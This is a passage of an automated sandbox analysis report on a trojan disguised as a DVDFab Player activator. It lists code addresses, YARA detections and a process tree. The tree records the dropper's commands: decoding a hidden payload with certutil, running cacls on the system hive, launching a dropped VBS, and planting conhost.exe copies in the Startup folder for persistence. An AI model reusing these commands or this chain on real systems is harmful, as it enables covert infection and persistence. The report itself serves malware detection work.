Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140091108
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014003F130
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014007B14E
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140025154
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140065180
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400531B0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400431B0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400031C3
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014006F1D0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014004D200
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400C7220
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140019230
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140069250
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400352E6
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140097300
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140099325
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400AB390
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014001B410
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400AD420
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140017460
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014003F4D0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400A34DC
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140039500
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014005D520
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140085530
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014004B550
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400575B0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400D55A4
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400315CC
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014008B6F0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140051700
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400CD710
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014004F715
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014006D730
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400D1724
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400B1750
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140063750
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014006B780
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014004D780
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400D57CC
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140093800
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014002B800
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014005F802
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014003D840
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014007D8A0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400498F0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014004B920
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014000D9B0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014004F9CC
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400619E0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014005B9E0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140013A00
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140033A88
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140039AF5
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014004DB8B
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014002FBB0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014000FBB0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140095BDB
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140095BE9
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140095BF4
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140045C4B
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014007DC70
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140095CB0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140049CC0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014004BCC0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140095CC9
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140095CD1
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140095CE7
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140059D20
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140079DE0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140097E30
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014009BE60
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140097F1B
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140045F6B
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140071F90
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AAFD63C0
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AAFD53E0
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AAFE6820
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AAFE3C40
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AAFE6490
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AAFE4CC0
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AAFE44D0
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AAFED4E0
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AAFEEB50
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AAFE0370
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AAFFF234
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AB005280
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AB001A78
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AAFE4290
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AAFFFACC
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AAFF92F0
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AAFEFB10
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AAFE6130
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AAFD29C0
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AAFDD215
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AAFD3070
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AAFEE8B0
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AAFD63C0
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AAFE50E0
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AAFE18D9
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AAFDF760
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AAFE1FF2
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AB002E20
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AAFD3670
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AAFFDE6C
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AB0056AC
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AAFF9558
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AAFD9D80
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AB0085A8
Source: C:\ProgramData\conhost.exe	Code function: 8_2_00007FF7AAFF05B0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFA161E0CD0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFA161E0D7F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFA161E0D90
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFA161D4EE1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFA161D6131
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFA161D4B08
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFA161DD740
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFA161D35B0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFA161DADD6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFA161DDE95
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFA161D0CE5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFA161D4CDD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFA161D62EE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFA161D4B58
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFA161D3550
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFA161D6591
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFA161DBC19
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFA162A1145
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFA162A0E0E
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C053E0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C063C0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C10370
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C1EB50
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C1D4E0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C0CD10
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C17CA0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C144D0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C14CC0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C16490
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C13C40
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C16130
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C12130
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C292F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C1FB10
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C2FACC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C14290
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C31A78
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C35280
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C2F234
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C150E0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C1E8B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C063C0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C03070
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C11890
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C16820
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C385A8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C205B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C29558
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C09D80
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C356AC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C17EB0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C2DE6C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C0F670
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C03670
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C32E20

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: String function: 00000001400C8EEC appears 390 times
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: String function: 000000014003FE10 appears 59 times
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: String function: 0000000140040160 appears 455 times
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: String function: 00000001400C9144 appears 59 times

Source: Ne - Copy.exe.0.dr

Static PE information: Resource name: RT_RCDATA type: PE32+ executable (GUI) x86-64, for MS Windows

Source: xuXIetZvv6.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: xuXIetZvv6.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: xuXIetZvv6.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Ne - Copy.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Ne - Copy.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Ne - Copy.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Ne - Copy.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Ne - Copy.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: conhost.exe.3.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: conhost.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: conhost.exe.8.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: conhost.exe.8.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: conhost.exe.17.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: conhost.exe.17.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: conhost.exe.26.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: conhost.exe.26.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: conhost.exe.35.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: conhost.exe.35.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: xuXIetZvv6.exe	Binary or memory string: OriginalFilename vs xuXIetZvv6.exe
Source: xuXIetZvv6.exe, 00000000.00000002.234728553.0000000000D50000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs xuXIetZvv6.exe
Source: xuXIetZvv6.exe, 00000000.00000002.234728553.0000000000D50000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs xuXIetZvv6.exe
Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamelauncher.exe0 vs xuXIetZvv6.exe
Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp	Binary or memory string: OriginalFilename vs xuXIetZvv6.exe
Source: xuXIetZvv6.exe, 00000000.00000002.239795364.000000001BD90000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs xuXIetZvv6.exe
Source: xuXIetZvv6.exe, 00000000.00000000.219734739.00000000007D8000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameDVDFabPlayer5Activator.exe4 vs xuXIetZvv6.exe
Source: xuXIetZvv6.exe, 00000000.00000002.235652832.0000000001040000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs xuXIetZvv6.exe
Source: xuXIetZvv6.exe, 00000000.00000002.234823805.0000000000D8A000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs xuXIetZvv6.exe

Source: xuXIetZvv6.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000000.00000002.236414924.0000000002C42000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000007.00000002.234040643.000001B999F40000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 2017-08-29
Source: 00000000.00000002.236345549.0000000002C31000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 2017-08-29
Source: Process Memory Space: certutil.exe PID: 6712, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 2017-08-29
Source: C:\Users\user\AppData\Roaming\DVDFab Player 5\regRecord\localuse.tmp, type: DROPPED	Matched rule: SUSP_certificate_payload date = 2018/08/02, author = Didier Stevens, Florian Roth, description = Detects payloads that pretend to be certificates, reference = https://blog.nviso.be/2018/08/02/powershell-inside-a-certificate-part-3/, score =
Source: C:\Users\user\AppData\Roaming\winlogon.vbs, type: DROPPED	Matched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\DVDFabPlayer5Activator.cmd, type: DROPPED	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 2017-08-29
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.vbs, type: DROPPED	Matched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: classification engine

Classification label: mal100.troj.adwa.evad.winEXE@41/26@3/3

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

Code function: 3_2_00000001400415D0 CreateProcessW,CloseHandle,GetLastError,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,CloseHandle,GetLastError,FormatMessageW,

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

Code function: 3_2_00000001400810B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

Code function: 3_2_00000001400605B9 wcsncpy,GetDiskFreeSpaceW,GetLastError,malloc,

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

Code function: 3_2_0000000140081340 CreateToolhelp32Snapshot,Process32FirstW,_wcstoi64,Process32NextW,Process32NextW,CloseHandle,CloseHandle,CloseHandle,

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

Code function: 3_2_000000014007FC00 CoInitialize,CoCreateInstance,GetKeyboardLayout,GetFullPathNameW,malloc,CoUninitialize,

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

Code function: 3_2_00000001400203C0 FindResourceW,FindResourceW,SizeofResource,LoadResource,LockResource,

Source: C:\Users\user\Desktop\xuXIetZvv6.exe

File created: C:\Users\user\AppData\Roaming\DVDFabPlayer5Activator.cmd

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6956:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1688:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:328:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6900:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6872:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6556:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6980:120:WilError_01

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uv5m24xa.nma.ps1

Jump to behavior

Source: C:\Users\user\Desktop\xuXIetZvv6.exe

Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\winlogon.vbs'

Source: xuXIetZvv6.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\xuXIetZvv6.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Source: C:\Users\user\Desktop\xuXIetZvv6.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\xuXIetZvv6.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: xuXIetZvv6.exe	Virustotal: Detection: 54%
Source: xuXIetZvv6.exe	Metadefender: Detection: 23%
Source: xuXIetZvv6.exe	ReversingLabs: Detection: 55%

Source: unknown	Process created: C:\Users\user\Desktop\xuXIetZvv6.exe 'C:\Users\user\Desktop\xuXIetZvv6.exe'
Source: C:\Users\user\Desktop\xuXIetZvv6.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Roaming\DVDFabPlayer5Activator.cmd' '
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\xuXIetZvv6.exe	Process created: C:\Users\user\AppData\Roaming\Ne - Copy.exe 'C:\Users\user\AppData\Roaming\Ne - Copy.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cacls.exe 'C:\Windows\system32\cacls.exe' 'C:\Windows\system32\config\system'
Source: C:\Users\user\Desktop\xuXIetZvv6.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\winlogon.vbs'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -decode 'C:\Users\user\AppData\Roaming\DVDFab Player 5\regRecord\localuse.tmp' 'C:\Users\user\AppData\Roaming\DVDFab Player 5\regRecord\localuse.rec'
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Process created: C:\ProgramData\conhost.exe C:\ProgramData/conhost.exe
